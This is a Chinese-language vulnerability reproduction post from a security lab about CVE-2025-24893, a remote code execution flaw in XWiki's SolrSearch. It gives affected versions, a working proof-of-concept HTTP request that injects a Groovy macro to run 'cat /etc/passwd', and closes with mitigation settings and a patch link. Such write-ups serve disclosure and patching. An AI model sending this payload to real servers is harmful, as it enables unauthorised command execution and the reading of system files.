网安引领时代,弥天点亮未来
本次测试仅供学习使用,如若非法他用,与平台和本文作者无关,需自行负责!
XWiki Platform是XWiki开源的一套用于创建Web协作应用程序的Wiki平台。
XWiki Platform存在安全漏洞,该漏洞源于任何来宾用户都可以通过对SolrSearch的请求,造成远程代码执行。CVE-2025-24893是针对XWiki平台SolrSearchMacros组件的远程代码执行漏洞(RCE),该漏洞源于对用户输入数据的未充分过滤,攻击者可利用Solr查询参数注入恶意代码,通过服务端模板引擎(如Velocity或Groovy)触发命令执行。
16.0.0-rc-1<=org.xwiki.platform:xwiki-platform-search-solr-ui<16.4.1
5.3-milestone-2<=org.xwiki.platform:xwiki-platform-search-solr-ui<15.10.11
1.访问漏洞环境
2.对漏洞进行复现
POC
漏洞复现
GET /bin/get/Main/SolrSearch?media=rss&text=%7d%7d%7d%7b%7basync%20async%3dfalse%7d%7d%7b%7bgroovy%7d%7dprintln(%22cat%20/etc/passwd%22.execute().text)%7b%7b%2fgroovy%7d%7d%7b%7b%2fasync%7d%7d%20 HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
执行payload,通过响应判断漏洞存在。
3.Yakit插件测试
目前厂商已发布升级补丁以修复漏洞,补丁获取链接:
临时解决:在xwiki.cfg 中禁用危险宏
rendering.restrictedParameters = velocity, groovy
rendering.transformations = macro, icon, link
建议尽快升级修复漏洞,再次声明本文仅供学习使用,非法他用责任自负!
https://github.com/xwiki/xwiki-platform/releases/tag/xwiki-platform-16.10.4
弥天简介
学海浩茫,予以风动,必降弥天之润!弥天安全实验室成立于2019年2月19日,主要研究安全防守溯源、威胁狩猎、漏洞复现、工具分享等不同领域。目前主要力量为民间白帽子,也是民间组织。主要以技术共享、交流等不断赋能自己,赋能安全圈,为网络安全发展贡献自己的微薄之力。
口号 网安引领时代,弥天点亮未来
知识分享完了
喜欢别忘了关注我们哦~
弥 天
安全实验室
推荐站内搜索:最好用的开发软件、免费开源系统、渗透测试工具云盘下载、最新渗透测试资料、最新黑客工具下载……
还没有评论,来说两句吧...